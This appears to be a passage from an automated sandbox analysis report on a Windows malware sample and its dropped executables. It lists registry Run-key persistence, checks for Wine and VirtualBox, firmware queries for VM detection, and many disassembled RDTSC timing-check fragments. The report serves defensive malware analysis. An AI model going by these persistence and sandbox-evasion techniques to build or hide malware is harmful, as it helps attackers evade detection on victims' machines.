                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 846d486827.exe
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 846d486827.exe
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run fb696bafb5.exe
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run fb696bafb5.exe
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C9C55F0 LoadLibraryW,LoadLibraryW,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_6C9C55F0
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeRegistry key monitored for changes: HKEY_CURRENT_USER_Classes
                      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\DocumentsKJEGCFBGDH.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\1007634001\824db60d2b.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\1007634001\824db60d2b.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\1007637001\846d486827.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\1007637001\846d486827.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\taskkill.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\taskkill.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\taskkill.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\taskkill.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\taskkill.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\1007638001\fb696bafb5.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\1007638001\fb696bafb5.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\1007638001\fb696bafb5.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\1007638001\fb696bafb5.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\1007638001\fb696bafb5.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\1007638001\fb696bafb5.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\1007638001\fb696bafb5.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\1007638001\fb696bafb5.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\1007638001\fb696bafb5.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\1007638001\fb696bafb5.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\1007638001\fb696bafb5.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\1007638001\fb696bafb5.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\1007638001\fb696bafb5.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\1007638001\fb696bafb5.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\1007638001\fb696bafb5.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\1007638001\fb696bafb5.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\1007637001\846d486827.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\1007637001\846d486827.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\taskkill.exeProcess information set: NOOPENFILEERRORBOX

                      Malware Analysis System Evasion

                      barindex
                      Query firmware table information (likely to detect VMs)
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeSystem information queried: FirmwareTableInformation
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeSystem information queried: FirmwareTableInformation
                      Tries to detect sandboxes / dynamic malware analysis system (registry check)
                      Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                      Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                      Source: C:\Users\user\DocumentsKJEGCFBGDH.exeFile opened: HKEY_CURRENT_USER\Software\Wine
                      Source: C:\Users\user\DocumentsKJEGCFBGDH.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile opened: HKEY_CURRENT_USER\Software\Wine
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile opened: HKEY_CURRENT_USER\Software\Wine
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                      Source: C:\Users\user\AppData\Local\Temp\1007634001\824db60d2b.exeFile opened: HKEY_CURRENT_USER\Software\Wine
                      Source: C:\Users\user\AppData\Local\Temp\1007634001\824db60d2b.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeFile opened: HKEY_CURRENT_USER\Software\Wine
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeFile opened: HKEY_CURRENT_USER\Software\Wine
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                      Source: C:\Users\user\AppData\Local\Temp\1007636001\241fdb96f6.exeFile opened: HKEY_CURRENT_USER\Software\Wine
                      Source: C:\Users\user\AppData\Local\Temp\1007636001\241fdb96f6.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeFile opened: HKEY_CURRENT_USER\Software\Wine
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeFile opened: HKEY_CURRENT_USER\Software\Wine
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                      Source: C:\Users\user\AppData\Local\Temp\1007638001\fb696bafb5.exeFile opened: HKEY_CURRENT_USER\Software\Wine
                      Source: C:\Users\user\AppData\Local\Temp\1007638001\fb696bafb5.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                      Source: C:\Users\user\AppData\Local\Temp\1007636001\241fdb96f6.exeFile opened: HKEY_CURRENT_USER\Software\Wine
                      Source: C:\Users\user\AppData\Local\Temp\1007636001\241fdb96f6.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                      Tries to detect virtualization through RDTSC time measurements
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DF0190 second address: DF0199 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DF0199 second address: DEFA53 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F49A8F2A330h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a nop 0x0000000b pushad 0x0000000c movsx ecx, dx 0x0000000f popad 0x00000010 sub dword ptr [ebp+122D2223h], ecx 0x00000016 push dword ptr [ebp+122D14CDh] 0x0000001c sub dword ptr [ebp+122D1B22h], ebx 0x00000022 pushad 0x00000023 mov esi, edx 0x00000025 movzx ebx, ax 0x00000028 popad 0x00000029 call dword ptr [ebp+122D28CCh] 0x0000002f pushad 0x00000030 cmc 0x00000031 ja 00007F49A8F2A32Ch 0x00000037 mov dword ptr [ebp+122D2228h], edx 0x0000003d xor eax, eax 0x0000003f jmp 00007F49A8F2A331h 0x00000044 mov edx, dword ptr [esp+28h] 0x00000048 mov dword ptr [ebp+122D1DA8h], edx 0x0000004e mov dword ptr [ebp+122D3822h], eax 0x00000054 mov dword ptr [ebp+122D1DA8h], ecx 0x0000005a mov esi, 0000003Ch 0x0000005f clc 0x00000060 add esi, dword ptr [esp+24h] 0x00000064 mov dword ptr [ebp+122D1DA8h], eax 0x0000006a lodsw 0x0000006c sub dword ptr [ebp+122D1DA8h], eax 0x00000072 add eax, dword ptr [esp+24h] 0x00000076 xor dword ptr [ebp+122D1DA8h], esi 0x0000007c mov ebx, dword ptr [esp+24h] 0x00000080 jmp 00007F49A8F2A332h 0x00000085 clc 0x00000086 nop 0x00000087 jbe 00007F49A8F2A330h 0x0000008d push eax 0x0000008e push edx 0x0000008f pushad 0x00000090 popad 0x00000091 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F642C1 second address: F642C7 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F642C7 second address: F642D4 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 pop eax 0x00000005 push ecx 0x00000006 pop ecx 0x00000007 pop esi 0x00000008 push edi 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F6322A second address: F6322E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F6339B second address: F633A7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jbe 00007F49A8F2A326h 0x0000000c rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F633A7 second address: F633CC instructions: 0x00000000 rdtsc 0x00000002 jno 00007F49A854EE96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F49A854EEA7h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F633CC second address: F633D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F633D0 second address: F633D4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F633D4 second address: F633DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F633DA second address: F63411 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push edi 0x0000000b jmp 00007F49A854EEA8h 0x00000010 pushad 0x00000011 popad 0x00000012 pop edi 0x00000013 push ebx 0x00000014 jmp 00007F49A854EE9Fh 0x00000019 pop ebx 0x0000001a rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F63411 second address: F63428 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jmp 00007F49A8F2A332h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F63428 second address: F63430 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F635B3 second address: F635E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pushad 0x00000007 jmp 00007F49A8F2A337h 0x0000000c jmp 00007F49A8F2A32Fh 0x00000011 push eax 0x00000012 push edx 0x00000013 jp 00007F49A8F2A326h 0x00000019 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F63758 second address: F6376E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F49A854EE9Fh 0x0000000c rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F63B76 second address: F63B83 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F49A8F2A326h 0x0000000a push edi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F63B83 second address: F63B89 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F6792B second address: F6794A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop esi 0x00000006 push eax 0x00000007 push esi 0x00000008 ja 00007F49A8F2A328h 0x0000000e pop esi 0x0000000f mov eax, dword ptr [esp+04h] 0x00000013 push eax 0x00000014 push edx 0x00000015 jc 00007F49A8F2A328h 0x0000001b pushad 0x0000001c popad 0x0000001d rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F6794A second address: F67974 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F49A854EE9Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [eax] 0x0000000b jmp 00007F49A854EE9Dh 0x00000010 mov dword ptr [esp+04h], eax 0x00000014 push edx 0x00000015 js 00007F49A854EE9Ch 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F67974 second address: DEFA53 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 call 00007F49A8F2A337h 0x0000000b mov cx, di 0x0000000e pop edi 0x0000000f push dword ptr [ebp+122D14CDh] 0x00000015 call dword ptr [ebp+122D28CCh] 0x0000001b pushad 0x0000001c cmc 0x0000001d ja 00007F49A8F2A32Ch 0x00000023 mov dword ptr [ebp+122D2228h], edx 0x00000029 xor eax, eax 0x0000002b jmp 00007F49A8F2A331h 0x00000030 mov edx, dword ptr [esp+28h] 0x00000034 mov dword ptr [ebp+122D1DA8h], edx 0x0000003a mov dword ptr [ebp+122D3822h], eax 0x00000040 mov dword ptr [ebp+122D1DA8h], ecx 0x00000046 mov esi, 0000003Ch 0x0000004b clc 0x0000004c add esi, dword ptr [esp+24h] 0x00000050 mov dword ptr [ebp+122D1DA8h], eax 0x00000056 lodsw 0x00000058 sub dword ptr [ebp+122D1DA8h], eax 0x0000005e add eax, dword ptr [esp+24h] 0x00000062 xor dword ptr [ebp+122D1DA8h], esi 0x00000068 mov ebx, dword ptr [esp+24h] 0x0000006c jmp 00007F49A8F2A332h 0x00000071 clc 0x00000072 nop 0x00000073 jbe 00007F49A8F2A330h 0x00000079 push eax 0x0000007a push edx 0x0000007b pushad 0x0000007c popad 0x0000007d rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F67AA8 second address: F67AAC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F67AAC second address: F67AB2 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F67AB2 second address: F67ABC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007F49A854EE96h 0x0000000a rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F67ABC second address: F67AE5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop eax 0x00000009 mov edx, edi 0x0000000b lea ebx, dword ptr [ebp+1244B858h] 0x00000011 movsx ecx, dx 0x00000014 xchg eax, ebx 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F49A8F2A332h 0x0000001c rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F67B44 second address: F67B49 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F67B49 second address: F67B53 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F49A8F2A32Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F67B53 second address: F67BEF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dword ptr [esp], eax 0x00000009 push 00000000h 0x0000000b jmp 00007F49A854EEA6h 0x00000010 push 0836D1BBh 0x00000015 js 00007F49A854EEAFh 0x0000001b jmp 00007F49A854EEA9h 0x00000020 xor dword ptr [esp], 0836D13Bh 0x00000027 push eax 0x00000028 jmp 00007F49A854EEA7h 0x0000002d pop edi 0x0000002e push 00000003h 0x00000030 pushad 0x00000031 mov dword ptr [ebp+122D17CFh], eax 0x00000037 mov eax, dword ptr [ebp+122D3982h] 0x0000003d popad 0x0000003e push 00000000h 0x00000040 mov ch, 4Ah 0x00000042 mov esi, dword ptr [ebp+122D3796h] 0x00000048 push 00000003h 0x0000004a mov dword ptr [ebp+122D1AE9h], eax 0x00000050 mov dword ptr [ebp+122D1E26h], ebx 0x00000056 push 93C0539Eh 0x0000005b jbe 00007F49A854EEB2h 0x00000061 push eax 0x00000062 push edx 0x00000063 pushad 0x00000064 popad 0x00000065 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F788E6 second address: F788F7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F49A8F2A32Dh 0x00000009 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F788F7 second address: F788FB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F788FB second address: F7890E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jg 00007F49A8F2A328h 0x00000011 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F85A89 second address: F85A93 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F49A854EE96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F868DB second address: F868E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push edx 0x00000007 pop edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F868E5 second address: F868EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F86A8C second address: F86A91 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F7E834 second address: F7E85B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F49A854EEA7h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop esi 0x0000000c je 00007F49A854EEB2h 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F87253 second address: F87259 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F874E6 second address: F87504 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F49A854EE9Fh 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F87504 second address: F87535 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pushad 0x00000007 popad 0x00000008 jmp 00007F49A8F2A335h 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 jnp 00007F49A8F2A326h 0x00000016 jmp 00007F49A8F2A32Bh 0x0000001b rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F87535 second address: F87539 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F87539 second address: F8753F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F8753F second address: F87544 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F87544 second address: F87559 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F49A8F2A326h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jg 00007F49A8F2A326h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F87559 second address: F8755D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F877CE second address: F877D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F877D5 second address: F877DC instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F877DC second address: F87804 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a push edx 0x0000000b pop edx 0x0000000c pushad 0x0000000d popad 0x0000000e pushad 0x0000000f popad 0x00000010 jmp 00007F49A8F2A337h 0x00000015 popad 0x00000016 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F87804 second address: F87813 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pushad 0x00000004 popad 0x00000005 pop esi 0x00000006 pushad 0x00000007 jg 00007F49A854EE96h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F87813 second address: F87819 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F8A888 second address: F8A88C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F8A88C second address: F8A8AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F49A8F2A331h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jc 00007F49A8F2A338h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F8DB90 second address: F8DB96 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F8DB96 second address: F8DC42 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F49A8F2A326h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d stc 0x0000000e push dword ptr fs:[00000000h] 0x00000015 jp 00007F49A8F2A333h 0x0000001b mov dword ptr fs:[00000000h], esp 0x00000022 stc 0x00000023 lea eax, dword ptr [ebp+12471FE5h] 0x00000029 push 00000000h 0x0000002b push ebp 0x0000002c call 00007F49A8F2A328h 0x00000031 pop ebp 0x00000032 mov dword ptr [esp+04h], ebp 0x00000036 add dword ptr [esp+04h], 00000018h 0x0000003e inc ebp 0x0000003f push ebp 0x00000040 ret 0x00000041 pop ebp 0x00000042 ret 0x00000043 pushad 0x00000044 mov bx, cx 0x00000047 xor ebx, 49ABBE76h 0x0000004d popad 0x0000004e mov dword ptr [eax+01h], esp 0x00000051 jg 00007F49A8F2A32Ch 0x00000057 lea eax, dword ptr [ebp+12471FFBh] 0x0000005d jnl 00007F49A8F2A336h 0x00000063 mov dword ptr [eax+01h], ebp 0x00000066 cmc 0x00000067 mov byte ptr [ebp+122D2217h], 0000004Fh 0x0000006e js 00007F49A8F2A327h 0x00000074 clc 0x00000075 call 00007F49A8F2A329h 0x0000007a push esi 0x0000007b push eax 0x0000007c push edx 0x0000007d push eax 0x0000007e push edx 0x0000007f rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F8DC42 second address: F8DC46 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
